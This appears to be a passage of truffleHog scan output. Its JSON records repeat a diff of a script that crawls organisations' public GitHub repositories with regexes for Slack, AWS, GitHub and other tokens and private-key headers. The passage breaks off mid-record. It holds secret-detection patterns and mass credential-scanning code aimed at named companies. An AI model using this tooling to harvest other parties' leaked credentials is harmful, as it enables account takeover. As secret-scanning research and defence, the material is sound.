https://github.com/dxa4481/truffleHog/pull/9\n \"\"\"\n import requests\n from truffleHog import truffleHog\n-import re\n-from json import loads, dumps\n-\n-rules = {\n- \"Slack Token\": \"(xox[p|b|o|a]-[0-9]{12}-[0-9]{12}-[0-9]{12}-[a-z0-9]{32})\",\n- \"RSA private key\": \"-----BEGIN RSA PRIVATE KEY-----\",\n- \"SSH (OPENSSH) private key\": \"-----BEGIN OPENSSH PRIVATE KEY-----\",\n- \"SSH (DSA) private key\": \"-----BEGIN DSA PRIVATE KEY-----\",\n- \"SSH (EC) private key\": \"-----BEGIN EC PRIVATE KEY-----\",\n- \"PGP private key block\": \"-----BEGIN PGP PRIVATE KEY BLOCK-----\",\n- \"Facebook Oauth\": \"[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].{0,30}['\\\"\\\\s][0-9a-f]{32}['\\\"\\\\s]\",\n- \"Twitter Oauth\": \"[t|T][w|W][i|I][t|T][t|T][e|E][r|R].{0,30}['\\\"\\\\s][0-9a-zA-Z]{35,44}['\\\"\\\\s]\",\n- \"GitHub\": \"[g|G][i|I][t|T][h|H][u|U][b|B].{0,30}['\\\"\\\\s][0-9a-zA-Z]{35,40}['\\\"\\\\s]\",\n- \"Google Oauth\": \"(\\\"client_secret\\\":\\\"[a-zA-Z0-9-_]{24}\\\")\",\n- \"AWS API Key\": \"AKIA[0-9A-Z]{16}\",\n- \"Heroku API Key\": \"[h|H][e|E][r|R][o|O][k|K][u|U].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}\",\n- \"Generic Secret\": \"[s|S][e|E][c|C][r|R][e|E][t|T].{0,30}['\\\"\\\\s][0-9a-zA-Z]{32,45}['\\\"\\\\s]\",\n- \"Generic API Key\": \"[a|A][p|P][i|I][_]?[k|K][e|E][y|Y].{0,30}['\\\"\\\\s][0-9a-zA-Z]{32,45}['\\\"\\\\s]\",\n- \"Slack Webhook\": \"https://hooks.slack.com/services/T[a-zA-Z0-9_]{8}/B[a-zA-Z0-9_]{8}/[a-zA-Z0-9_]{24}\",\n- \"Google (GCP) Service-account\": \"\\\"type\\\": \\\"service_account\\\"\",\n- \"Twilio API Key\": \"SK[a-z0-9]{32}\",\n- \"Password in URL\": \"[a-zA-Z]{3,10}://[^/\\\\s:@]{3,20}:[^/\\\\s:@]{3,20}@.{1,100}[\\\"'\\\\s]\",\n-}\n-\n-for key in rules:\n- rules[key] = re.compile(rules[key])\n \n def get_org_repos(orgname, page):\n response = requests.get(url='https://api.github.com/users/' + orgname + '/repos?page={}'.format(page))\n@@ -37,16 +11,8 @@ def get_org_repos(orgname, page):\n if not json:\n return None\n for item in json:\n-\n- if item['fork'] == False and reached:\n+ if item['private'] == False:\n print('searching ' + item[\"html_url\"])\n- results = truffleHog.find_strings(item[\"html_url\"], do_regex=True, custom_regexes=rules, do_entropy=False, max_depth=100000)\n- for issue in results[\"foundIssues\"]:\n- d = loads(open(issue).read())\n- d['github_url'] = \"{}/blob/{}/{}\".format(item[\"html_url\"], d['commitHash'], d['path'])\n- d['github_commit_url'] = \"{}/commit/{}\".format(item[\"html_url\"], d['commitHash'])\n- d['diff'] = d['diff'][0:200]\n- d['printDiff'] = d['printDiff'][0:200]\n- print(dumps(d, indent=4))\n+ truffleHog.find_strings(item[\"html_url\"], do_regex=True, do_entropy=False, max_depth=100000)\n get_org_repos(orgname, page + 1)\n-get_org_repos(\"square\", 1)\n+get_org_repos(\"twitter\", 1)\n", "path": "scripts/searchOrg.py", "printDiff": "\u001b[93m-----BEGIN RSA PRIVATE KEY-----\u001b[0m", "reason": "RSA private key", "stringsFound": ["-----BEGIN RSA PRIVATE KEY-----"]} +{"branch": "origin/dev", "commit": "resolving merge conflicts\n", "commitHash": "466cdc94b4fcb0acd1904726a9b4de5c26e9125d", "date": "2019-05-06 07:47:40", "diff": "@@ -4,32 +4,6 @@ via https://github.com/dxa4481/truffleHog/pull/9\n \"\"\"\n import requests\n from truffleHog import truffleHog\n-import re\n-from json import loads, dumps\n-\n-rules = {\n- \"Slack Token\": \"(xox[p|b|o|a]-[0-9]{12}-[0-9]{12}-[0-9]{12}-[a-z0-9]{32})\",\n- \"RSA private key\": \"-----BEGIN RSA PRIVATE KEY-----\",\n- \"SSH (OPENSSH) private key\": \"-----BEGIN OPENSSH PRIVATE KEY-----\",\n- \"SSH (DSA) private key\": \"-----BEGIN DSA PRIVATE KEY-----\",\n- \"SSH (EC) private key\": \"-----BEGIN EC PRIVATE KEY-----\",\n- \"PGP private key block\": \"-----BEGIN PGP PRIVATE KEY BLOCK-----\",\n- \"Facebook Oauth\": \"[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].{0,30}['\\\"\\\\s][0-9a-f]{32}['\\\"\\\\s]\",\n- \"Twitter Oauth\": \"[t|T][w|W][i|I][t|T][t|T][e|E][r|R].{0,30}['\\\"\\\\s][0-9a-zA-Z]{35,44}['\\\"\\\\s]\",\n- \"GitHub\": \"[g|G][i|I][t|T][h|H][u|U][b|B].{0,30}['\\\"\\\\s][0-9a-zA-Z]{35,40}['\\\"\\\\s]\",\n- \"Google Oauth\": \"(\\\"client_secret\\\":\\\"[a-zA-Z0-9-_]{24}\\\")\",\n- \"AWS API Key\": \"AKIA[0-9A-Z]{16}\",\n- \"Heroku API Key\": \"[h|H][e|E][r|R][o|O][k|K][u|U].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}\",\n- \"Generic Secret\": \"[s|S][e|E][c|C][r|R][e|E][t|T].{0,30}['\\\"\\\\s][0-9a-zA-Z]{32,45}['\\\"\\\\s]\",\n- \"Generic API Key\": \"[a|A][p|P][i|I][_]?[k|K][e|E][y|Y].{0,30}['\\\"\\\\s][0-9a-zA-Z]{32,45}['\\\"\\\\s]\",\n- \"Slack Webhook\": \"https://hooks.slack.com/services/T[a-zA-Z0-9_]{8}/B[a-zA-Z0-9_]{8}/[a-zA-Z0-9_]{24}\",\n- \"Google (GCP) Service-account\": \"\\\"type\\\": \\\"service_account\\\"\",\n- \"Twilio API Key\": \"SK[a-z0-9]{32}\",\n- \"Password in URL\": \"[a-zA-Z]{3,10}://[^/\\\\s:@]{3,20}:[^/\\\\s:@]{3,20}@.{1,100}[\\\"'\\\\s]\",\n-}\n-\n-for key in rules:\n- rules[key] = re.compile(rules[key])\n \n def get_org_repos(orgname, page):\n response = requests.get(url='https://api.github.com/users/' + orgname + '/repos?page={}'.format(page))\n@@ -37,16 +11,8 @@ def get_org_repos(orgname, page):\n if not json:\n return None\n for item in json:\n-\n- if item['fork'] == False and reached:\n+ if item['private'] == False:\n print('searching ' + item[\"html_url\"])\n- results = truffleHog.find_strings(item[\"html_url\"], do_regex=True, custom_regexes=rules, do_entropy=False, max_depth=100000)\n- for issue in results[\"foundIssues\"]:\n- d = loads(open(issue).read())\n- d['github_url'] = \"{}/blob/{}/{}\".format(item[\"html_url\"], d['commitHash'], d['path'])\n- d['github_commit_url'] = \"{}/commit/{}\".format(item[\"html_url\"], d['commitHash'])\n- d['diff'] = d['diff'][0:200]\n- d['printDiff'] = d['printDiff'][0:200]\n- print(dumps(d, indent=4))\n+ truffleHog.find_strings(item[\"html_url\"], do_regex=True, do_entropy=False, max_depth=100000)\n get_org_repos(orgname, page + 1)\n-get_org_repos(\"square\", 1)\n+get_org_repos(\"twitter\", 1)\n", "path": "scripts/searchOrg.py", "printDiff": "\u001b[93m-----BEGIN OPENSSH PRIVATE KEY-----\u001b[0m", "reason": "SSH (OPENSSH) private key", "stringsFound": ["-----BEGIN OPENSSH PRIVATE KEY-----"]} +{"branch": "origin/dev", "commit": "resolving merge conflicts\n", "commitHash": "466cdc94b4fcb0acd1904726a9b4de5c26e9125d", "date": "2019-05-06 07:47:40", "diff": "@@ -4,32 +4,6 @@ via https://github.com/dxa4481/truffleHog/pull/9\n \"\"\"\n import requests\n from truffleHog import truffleHog\n-import re\n-from json import loads, dumps\n-\n-rules = {\n- \"Slack Token\": \"(xox[p|b|o|a]-[0-9]{12}-[0-9]{12}-[0-9]{12}-[a-z0-9]{32})\",\n- \"RSA private key\": \"-----BEGIN RSA PRIVATE KEY-----\",\n- \"SSH (OPENSSH) private key\": \"-----BEGIN OPENSSH PRIVATE KEY-----\",\n- \"SSH (DSA) private key\": \"-----BEGIN DSA PRIVATE KEY-----\",\n- \"SSH (EC) private key\": \"-----BEGIN EC PRIVATE KEY-----\",\n- \"PGP private key block\": \"-----BEGIN PGP PRIVATE KEY BLOCK-----\",\n- \"Facebook Oauth\": \"[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].{0,30}['\\\"\\\\s][0-9a-f]{32}['\\\"\\\\s]\",\n- \"Twitter Oauth\": \"[t|T][w|W][i|I][t|T][t|T][e|E][r|R].{0,30}['\\\"\\\\s][0-9a-zA-Z]{35,44}['\\\"\\\\s]\",\n- \"GitHub\": \"[g|G][i|I][t|T][h|H][u|U][b|B].{0,30}['\\\"\\\\s][0-9a-zA-Z]{35,40}['\\\"\\\\s]\",\n- \"Google Oauth\": \"(\\\"client_secret\\\":\\\"[a-zA-Z0-9-_]{24}\\\")\",\n- \"AWS API Key\": \"AKIA[0-9A-Z]{16}\",\n- \"Heroku API Key\": \"[h|H][e|E][r|R][o|O][k|K][u|U].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}\",\n- \"Generic Secret\": \"[s|S][e|E][c|C][r|R][e|E][t|T].{0,30}['\\\"\\\\s][0-9a-zA-Z]{32,45}['\\\"\\\\s]\",\n- \"Generic API Key\": \"[a|A][p|P][i|I][_]?[k|K][e|E][y|Y].{0,30}['\\\"\\\\s][0-9a-zA-Z]{32,45}['\\\"\\\\s]\",\n- \"Slack Webhook\": \"https://hooks.slack.com/services/T[a-zA-Z0-9_]{8}/B[a-zA-Z0-9_]{8}/[a-zA-Z0-9_]{24}\",\n- \"Google (GCP) Service-account\": \"\\\"type\\\": \\\"service_account\\\"\",\n- \"Twilio API Key\": \"SK[a-z0-9]{32}\",\n- \"Password in URL\": \"[a-zA-Z]{3,10}://[^/\\\\s:@]{3,20}:[^/\\\\s:@]{3,20}@.{1,100}[\\\"'\\\\s]\",\n-}\n-\n-for key in rules:\n- rules[key] = re.compile(rules[key])\n \n def get_org_repos(orgname, page):\n response = requests.get(url='https://api.github.com/users/' + orgname + '/repos?page={}'.format(page))\n@@ -37,16 +11,8 @@ def get_org_repos(orgname, page):\n if not json:\n return None\n for item in json:\n-\n- if item['fork'] == False and reached:\n+ if item['private'] == False:\n print('searching ' + item[\"html_url\"])\n- results = truffleHog.find_strings(item[\"html_url\"], do_regex=True, custom_regexes=rules, do_entropy=False, max_depth=100000)\n- for issue in results[\"foundIssues\"]:\n- d = loads(open(issue).read())\n- d['github_url'] = \"{}/blob/{}/{}\".format(item[\"html_url\"], d['commitHash'], d['path'])\n- d['github_commit_url'] = \"{}/commit/{}\".format(item[\"html_url\"], d['commitHash'])\n- d['diff'] = d['diff'][0:200]\n- d['printDiff'] = d['printDiff'][0:200]\n- print(dumps(d, indent=4))\n+ truffleHog.find_strings(item[\"html_url\"], do_regex=True, do_entropy=False, max_depth=100000)\n get_org_repos(orgname, page + 1)\n-get_org_repos(\"square\", 1)\n+get_org_repos(\"twitter\", 1)\n", "path": "scripts/searchOrg.py", "printDiff": "\u001b[93m-----BEGIN DSA PRIVATE KEY-----\u001b[0m", "reason": "SSH (DSA) private key", "stringsFound": ["-----BEGIN DSA PRIVATE KEY-----"]} +{"branch": "origin/dev", "commit": "resolving merge conflicts\n", "commitHash": "466cdc94b4fcb0acd1904726a9b4de5c26e9125d", "date": "2019-05-06 07:47:40", "diff": "@@ -4,32 +4,6 @@ via https://github.com/dxa4481/truffleHog/pull/9\n \"\"\"\n import requests\n from truffleHog import truffleHog\n-import re\n-from json import loads, dumps\n-\n-rules = {\n- \"Slack Token\": \"(xox[p|b|o|a]-[0-9]{12}-[0-9]{12}-[0-9]{12}-[a-z0-9]{32})\",\n- \"RSA private key\": \"-----BEGIN RSA PRIVATE KEY-----\",\n- \"SSH (OPENSSH) private key\": \"-----BEGIN OPENSSH PRIVATE KEY-----\",\n- \"SSH (DSA) private key\": \"-----BEGIN DSA PRIVATE KEY-----\",\n- \"SSH (EC) private key\": \"-----BEGIN EC PRIVATE KEY-----\",\n- \"PGP private key block\": \"-----BEGIN PGP PRIVATE KEY BLOCK-----\",\n- \"Facebook Oauth\": \"[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].{0,30}['\\\"\\\\s][0-9a-f]{32}['\\\"\\\\s]\",\n- \"Twitter Oauth\": \"[t|T][w|W][i|I][t|T][t|T][e|E][r|R].{0,30}['\\\"\\\\s][0-9a-zA-Z]{35,44}['\\\"\\\\s]\",\n- \"GitHub\": \"[g|G][i|I][t|T][h|H][u|U][b|B].{0,30}['\\\"\\\\s][0-9a-zA-Z]{35,40}['\\\"\\\\s]\",\n- \"Google Oauth\": \"(\\\"client_secret\\\":\\\"[a-zA-Z0-9-_]{24}\\\")\",\n- \"AWS API Key\": \"AKIA[0-9A-Z]{16}\",\n- \"Heroku API Key\": \"[h|H][e|E][r|R][o|O][k|K][u|U].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}\",\n- \"Generic Secret\": \"[s|S][e|E][c|C][r|R][e|E][t|T].{0,30}['\\\"\\\\s][0-9a-zA-Z]{32,45}['\\\"\\\\s]\",\n- \"Generic API Key\": \"[a|A][p|P][i|I][_]?[k|K][e|E][y|Y].{0,30}['\\\"\\\\s][0-9a-zA-Z]{32,45}['\\\"\\\\s]\",\n- \"Slack Webhook\": \"https://hooks.slack.com/services/T[a-zA-Z0-9_]{8}/B[a-zA-Z0-9_]{8}/[a-zA-Z0-9_]{24}\",\n- \"Google (GCP) Service-account\": \"\\\"type\\\": \\\"service_account\\\"\",\n- \"Twilio API Key\": \"SK[a-z0-9]{32}\",\n- \"Password in URL\": \"[a-zA-Z]{3,10}://[^/\\\\s:@]{3,20}:[^/\\\\s:@]{3,20}@.{1,100}[\\\"'\\\\s]\",\n-}\n-\n-for key in rules:\n- rules[key] = re.compile(rules[key])\n \n def get_org_repos(orgname, page):\n response = requests.get(url='https://api.github.com/users/' + orgname + '/repos?page={}'.format(page))\n@@ -37,16 +11,8 @@ def get_org_repos(orgname, page):\n if not json:\n return None\n for item in json:\n-\n- if item['fork'] == False and reached:\n+ if item['private'] == False:\n print('searching ' + item[\"html_url\"])\n- results = truffleHog.find_strings(item[\"html_url\"], do_regex=True, custom_regexes=rules, do_entropy=False, max_depth=100000)\n- for issue in results[\"foundIssues\"]:\n- d = loads(open(issue).read())\n- d['github_url'] = \"{}/blob/{}/{}\".format(item[\"html_url\"], d['commitHash'], d['path'])\n- d['github_commit_url'] = \"{}/commit/{}\".format(item[\"html_url\"], d['commitHash'])\n- d['diff'] = d['diff'][0:200]\n- d['printDiff'] = d['printDiff'][0:200]\n- print(dumps(d, indent=4))\n+ truffleHog.find_strings(item[\"html_url\"], do_regex=True, do_entropy=False, max_depth=100000)\n get_org_repos(orgname, page + 1)\n-get_org_repos(\"square\", 1)\n+get_org_repos(\"twitter\", 1)\n", "path": "scripts/searchOrg.py", "printDiff": "\u001b[93m-----BEGIN EC PRIVATE KEY-----\u001b[0m", "reason": "SSH (EC) private key", "stringsFound": ["-----BEGIN EC PRIVATE KEY-----"]} +{"branch": "origin/dev", "commit": "resolving merge conflicts\n", "commitHash": "466cdc94b4fcb0acd1904726a9b4de5c26e9125d", "date": "2019-05-06 07:47:40", "diff": "@@ -4,32 +4,6 @@ via https://github.com/dxa4481/truffleHog/pull/9\n \"\"\"\n import requests\n from truffleHog import truffleHog\n-import re\n-from json import loads, dumps\n-\n-rules = {\n- \"Slack Token\": \"(xox[p|b|o|a]-[0-9]{12}-[0-9]{12}-[0-9]{12}-[a-z0-9]{32})\",\n- \"RSA private key\": \"-----BEGIN RSA PRIVATE KEY-----\",\n- \"SSH (OPENSSH) private key\": \"-----BEGIN OPENSSH PRIVATE KEY-----\",\n- \"SSH (DSA) private key\": \"-----BEGIN DSA PRIVATE KEY-----\",\n- \"SSH (EC) private key\": \"-----BEGIN EC PRIVATE KEY-----\",\n- \"PGP private key block\": \"-----BEGIN PGP PRIVATE KEY BLOCK-----\",\n- \"Facebook Oauth\": \"[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].{0,30}['\\\"\\\\s][0-9a-f]{32}['\\\"\\\\s]\",\n- \"Twitter Oauth\": \"[t|T][w|W][i|I][t|T][t|T][e|E][r|R].{0,30}['\\\"\\\\s][0-9a-zA-Z]{35,44}['\\\"\\\\s]\",\n- \"GitHub\": \"[g|G][i|I][t|T][h|H][u|U][b|B].{0,30}['\\\"\\\\s][0-9a-zA-Z]{35,40}['\\\"\\\\s]\",\n- \"Google Oauth\": \"(\\\"client_secret\\\":\\\"[a-zA-Z0-9-_]{24}\\\")\",\n- \"AWS API Key\": \"AKIA[0-9A-Z]{16}\",\n- \"Heroku API Key\": \"[h|H][e|E][r|R][o|O][k|K][u|U].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}\",\n- \"Generic Secret\": \"[s|S][e|E][c|C][r|R][e|E][t|T].{0,30}['\\\"\\\\s][0-9a-zA-Z]{32,45}['\\\"\\\\s]\",\n- \"Generic API Key\": \"[a|A][p|P][i|I][_]?[k|K][e|E][y|Y].{0,30}['\\\"\\\\s][0-9a-zA-Z]{32,45}['\\\"\\\\s]\",\n- \"Slack Webhook\": \"https://hooks.slack.com/services/T[a-zA-Z0-9_]{8}/B[a-zA-Z0-9_]{8}/[a-zA-Z0-9_]{24}\",\n- \"Google (GCP) Service-account\": \"\\\"type\\\": \\\"service_account\\\"\",\n- \"Twilio API Key\": \"SK[a-z0-9]{32}\",\n- \"Password in URL\": \"[a-zA-Z]{3,10}://[^/\\\\s:@]{3,20}:[^/\\\\s:@]{3,20}@.{1,100}[\\\"'\\\\s]\",\n-}\n-\n-for key in rules:\n- rules[key] = re.compile(rules[key])\n \n def get_org_repos(orgname, page):\n response = requests.get(url='https://api.github.com/users/' + orgname + '/repos?page={}'.format(page))\n@@ -37,16 +11,8 @@ def get_org_repos(orgname, page):\n if not json:\n return None\n for item in json:\n-\n- if item['fork'] == False and reached:\n+ if item['private'] == False:\n print('searching ' + item[\"html_url\"])\n- results = truffleHog.find_strings(item[\"html_url\"], do_regex=True, custom_regexes=rules, do_entropy=False, max_depth=100000)\n- for issue in results[\"foundIssues\"]:\n- d = loads(open(issue).read())\n- d['github_url'] = \"{}/blob/{}/{}\".format(item[\"html_url\"], d['commitHash'], d['path'])\n- d['github_commit_url'] = \"{}/commit/{}\".format(item[\"html_url\"], d['commitHash'])\n- d['diff'] = d['diff'][0:200]\n- d['printDiff'] = d['printDiff'][0:200]\n- print(dumps(d, indent=4))\n+ truffleHog.find_strings(item[\"html_url\"], do_regex=True, do_entropy=False, max_depth=100000)\n get_org_repos(orgname, page + 1)\n-get_org_repos(\"square\", 1)\n+get_org_repos(\"twitter\", 1)\n", "path": "scripts/searchOrg.py", "printDiff": "\u001b[93m-----BEGIN PGP PRIVATE KEY BLOCK-----\u001b[0m", "reason": "PGP private key block", "stringsFound": ["-----BEGIN PGP PRIVATE KEY BLOCK-----"]} +{"branch": "origin/dev", "commit": "Merge pull request #135 from max-sixty/patch-1\n\nBenifit -> Benefit", "commitHash": "a4c69fa2f6b256bfe824ac82b96c77eb8c06b2d0", "date": "2018-12-17 07:21:16", "diff": "@@ -4,6 +4,32 @@ via https://github.com/dxa4481/truffleHog/pull/9\n \"\"\"\n import requests\n from truffleHog import truffleHog\n+import re\n+from json import loads, dumps\n+\n+rules = {\n+ \"Slack Token\": \"(xox[p|b|o|a]-[0-9]{12}-[0-9]{12}-[0-9]{12}-[a-z0-9]{32})\",\n+ \"RSA private key\": \"-----BEGIN RSA PRIVATE KEY-----\",\n+ \"SSH (OPENSSH) private key\": \"-----BEGIN OPENSSH PRIVATE KEY-----\",\n+ \"SSH (DSA) private key\": \"-----BEGIN DSA PRIVATE KEY-----\",\n+ \"SSH (EC) private key\": \"-----BEGIN EC PRIVATE KEY-----\",\n+ \"PGP private key block\": \"-----BEGIN PGP PRIVATE KEY BLOCK-----\",\n+ \"Facebook Oauth\": \"[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].{0,30}['\\\"\\\\s][0-9a-f]{32}['\\\"\\\\s]\",\n+ \"Twitter Oauth\": \"[t|T][w|W][i|I][t|T][t|T][e|E][r|R].{0,30}['\\\"\\\\s][0-9a-zA-Z]{35,44}['\\\"\\\\s]\",\n+ \"GitHub\": \"[g|G][i|I][t|T][h|H][u|U][b|B].{0,30}['\\\"\\\\s][0-9a-zA-Z]{35,40}['\\\"\\\\s]\",\n+ \"Google Oauth\": \"(\\\"client_secret\\\":\\\"[a-zA-Z0-9-_]{24}\\\")\",\n+ \"AWS API Key\": \"AKIA[0-9A-Z]{16}\",\n+ \"Heroku API Key\": \"[h|H][e|E][r|R][o|O][k|K][u|U].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}\",\n+ \"Generic Secret\": \"[s|S][e|E][c|C][r|R][e|E][t|T].{0,30}['\\\"\\\\s][0-9a-zA-Z]{32,45}['\\\"\\\\s]\",\n+ \"Generic API Key\": \"[a|A][p|P][i|I][_]?[k|K][e|E][y|Y].{0,30}['\\\"\\\\s][0-9a-zA-Z]{32,45}['\\\"\\\\s]\",\n+ \"Slack Webhook\": \"https://hooks.slack.com/services/T[a-zA-Z0-9_]{8}/B[a-zA-Z0-9_]{8}/[a-zA-Z0-9_]{24}\",\n+ \"Google (GCP) Service-account\": \"\\\"type\\\": \\\"service_account\\\"\",\n+ \"Twilio API Key\": \"SK[a-z0-9]{32}\",\n+ \"Password in URL\": \"[a-zA-Z]{3,10}://[^/\\\\s:@]{3,20}:[^/\\\\s:@]{3,20}@.{1,100}[\\\"'\\\\s]\",\n+}\n+\n+for key in rules:\n+ rules[key] = re.compile(rules[key])\n \n def get_org_repos(orgname, page):\n response = requests.get(url='https://api.github.com/users/' + orgname + '/repos?page={}'.format(page))\n@@ -11,8 +37,16 @@ def get_org_repos(orgname, page):\n if not json:\n return None\n for item in json:\n- if item['private'] == False:\n+\n+ if item['fork'] == False and reached:\n print('searching ' + item[\"html_url\"])\n- truffleHog.find_strings(item[\"html_url\"], do_regex=True, do_entropy=False, max_depth=100000)\n+ results = truffleHog.find_strings(item[\"html_url\"], do_regex=True, custom_regexes=rules, do_entropy=False, max_depth=100000)\n+ for issue in results[\"foundIssues\"]:\n+ d = loads(open(issue).read())\n+ d['github_url'] = \"{}/blob/{}/{}\".format(item[\"html_url\"], d['commitHash'], d['path'])\n+ d['github_commit_url'] = \"{}/commit/{}\".format(item[\"html_url\"], d['commitHash'])\n+ d['diff'] = d['diff'][0:200]\n+ d['printDiff'] = d['printDiff'][0:200]\n+ print(dumps(d, indent=4))\n get_org_repos(orgname, page + 1)\n-get_org_repos(\"twitter\", 1)\n+get_org_repos(\"square\", 1)\n", "path": "scripts/searchOrg.py", "printDiff": "\u001b[93m-----BEGIN RSA PRIVATE KEY-----\u001b[0m", "reason": "RSA private key", "stringsFound": ["-----BEGIN RSA PRIVATE KEY-----"]} +{"branch": "origin/dev", "commit": "Merge pull request #135 from max-sixty/patch-1\n\nBenifit -> Benefit", "commitHash": "a4c69fa2f6b256bfe824ac82b96c77eb8c06b2d0", "date": "2018-12-17 07:21:16", "diff": "@@ -4,6 +4,32 @@ via https://github.com/dxa4481/truffleHog/pull/9\n \"\"\"\n import requests\n from truffleHog import truffleHog\n+import re\n+from json import loads, dumps\n+\n+rules = {\n+ \"Slack Token\": \"(xox[p|b|o|a]-[0-9]{12}-[0-9]{12}-[0-9]{12}-[a-z0-9]{32})\",\n+ \"RSA private key\": \"-----BEGIN RSA PRIVATE KEY-----\",\n+ \"SSH (OPENSSH) private key\": \"-----BEGIN OPENSSH PRIVATE KEY-----\",\n+ \"SSH (DSA) private key\": \"-----BEGIN DSA PRIVATE KEY-----\",\n+ \"SSH (EC) private key\": \"-----BEGIN EC PRIVATE KEY-----\",\n+ \"PGP private key block\": \"-----BEGIN PGP PRIVATE KEY BLOCK-----\",\n+ \"Facebook Oauth\": \"[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].{0,30}['\\\"\\\\s][0-9a-f]{32}['\\\"\\\\s]\",\n+ \"Twitter Oauth\": \"[t|T][w|W][i|I][t|T][t|T][e|E][r|R].{0,30}['\\\"\\\\s][0-9a-zA-Z]{35,44}['\\\"\\\\s]\",\n+ \"GitHub\": \"[g|G][i|I][t|T][h|H][u|U][b|B].{0,30}['\\\"\\\\s][0-9a-zA-Z]{35,40}['\\\"\\\\s]\",\n+ \"Google Oauth\": \"(\\\"client_secret\\\":\\\"[a-zA-Z0-9-_]{24}\\\")\",\n+ \"AWS API Key\": \"AKIA[0-9A-Z]{16}\",\n+ \"Heroku API Key\": \"[h|H][e|E][r|R][o|O][k|K][u|U].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}\",\n+ \"Generic Secret\": \"[s|S][e|E][c|C][r|R][e|E][t|T].{0,30}['\\\"\\\\s][0-9a-zA-Z]{32,45}['\\\"\\\\s]\",\n+ \"Generic API Key\": \"[a|A][p|P][i|I][_]?[k|K][e|E][y|Y].{0,30}['\\\"\\\\s][0-9a-zA-Z]{32,45}['\\\"\\\\s]\",\n+ \"Slack Webhook\": \"https://hooks.slack.com/services/T[a-zA-Z0-9_]{8}/B[a-zA-Z0-9_]{8}/[a-zA-Z0-9_]{24}\",\n+ \"Google (GCP) Service-account\": \"\\\"type\\\": \\\"service_account\\\"\",\n+ \"Twilio API Key\": \"SK[a-z0-9]{32}\",\n+ \"Password in URL\": \"[a-zA-Z]{3,10}://[^/\\\\s:@]{3,20}:[^/\\\\s:@]{3,20}@.{1,100}[\\\"'\\\\s]\",\n+}\n+\n+for key in rules:\n+ rules[key] = re.compile(rules[key])\n \n def get_org_repos(orgname, page):\n response = requests.get(url='https://api.github.com/users/' + orgname + '/repos?page={}'.format(page))\n@@ -11,8 +37,16 @@ def get_org_repos(orgname, page):\n if not json:\n return None\n for item in json:\n- if item['private'] == False:\n+\n+ if item['fork'] == False and reached:\n print('searching ' + item[\"html_url\"])\n- truffleHog.find_strings(item[\"html_url\"], do_regex=True, do_entropy=False, max_depth=100000)\n+ results = truffleHog.find_strings(item[\"html_url\"], do_regex=True, custom_regexes=rules, do_entropy=False, max_depth=100000)\n+ for issue in results[\"foundIssues\"]:\n+ d = loads(open(issue).read())\n+ d['github_url'] = \"{}/blob/{}/{}\".format(item[\"html_url\"], d['commitHash'], d['path'])\n+ d['github_commit_url'] = \"{}/commit/{}\".format(item[\"html_url\"], d['commitHash'])\n+ d['diff'] = d['diff'][0:200]\n+ d['printDiff'] = d['printDiff'][0:200]\n+ print(dumps(d, indent=4))\n get_org_repos(orgname, page + 1)\n-get_org_repos(\"twitter\", 1)\n+get_org_repos(\"square\", 1)\n", "path": "scripts/searchOrg.py", "printDiff": "\u001b[93m-----BEGIN OPENSSH PRIVATE KEY-----\u001b[0m", "reason": "SSH (OPENSSH) private key", "stringsFound": ["-----BEGIN OPENSSH PRIVATE KEY-----"]} +{"branch": "origin/dev", "commit": "Merge pull request #135 from max-sixty/patch-1\n\nBenifit -> Benefit", "commitHash": "a4c69fa2f6b256bfe824ac82b96c77eb8c06b2d0", "date": "2018-12-17 07:21:16", "diff": "@@ -4,6 +4,32 @@ via https://github.com/dxa4481/truffleHog/pull/9\n \"\"\"\n import requests\n from truffleHog import truffleHog\n+import re\n+from json import loads, dumps\n+\n+rules = {\n+ \"Slack Token\": \"(xox[p|b|o|a]-[0-9]{12}-[0-9]{12}-[0-9]{12}-[a-z0-9]{32})\",\n+ \"RSA private key\": \"-----BEGIN RSA PRIVATE KEY-----\",\n+ \"SSH (OPENSSH) private key\": \"-----BEGIN OPENSSH PRIVATE KEY-----\",\n+ \"SSH (DSA) private key\": \"-----BEGIN DSA PRIVATE KEY-----\",\n+ \"SSH (EC) private key\": \"-----BEGIN EC PRIVATE KEY-----\",\n+ \"PGP private key block\": \"-----BEGIN PGP PRIVATE KEY BLOCK-----\",\n+ \"Facebook Oauth\": \"[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].{0,30}['\\\"\\\\s][0-9a-f]{32}['\\\"\\\\s]\",\n+ \"Twitter Oauth\": \"[t|T][w|W][i|I][t|T][t|T][e|E][r|R].{0,30}['\\\"\\\\s][0-9a-zA-Z]{35,44}['\\\"\\\\s]\",\n+ \"GitHub\": \"[g|G][i|I][t|T][h|H][u|U][b|B].{0,30}['\\\"\\\\s][0-9a-zA-Z]{35,40}['\\\"\\\\s]\",\n+ \"Google Oauth\": \"(\\\"client_secret\\\":\\\"[a-zA-Z0-9-_]{24}\\\")\",\n+ \"AWS API Key\": \"AKIA[0-9A-Z]{16}\",\n+ \"Heroku API Key\": \"[h|H][e|E][r|R][o|O][k|K][u|U].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}\",\n+ \"Generic Secret\": \"[s|S][e|E][c|C][r|R][e|E][t|T].{0,30}['\\\"\\\\s][0-9a-zA-Z]{32,45}['\\\"\\\\s]\",\n+ \"Generic API Key\": 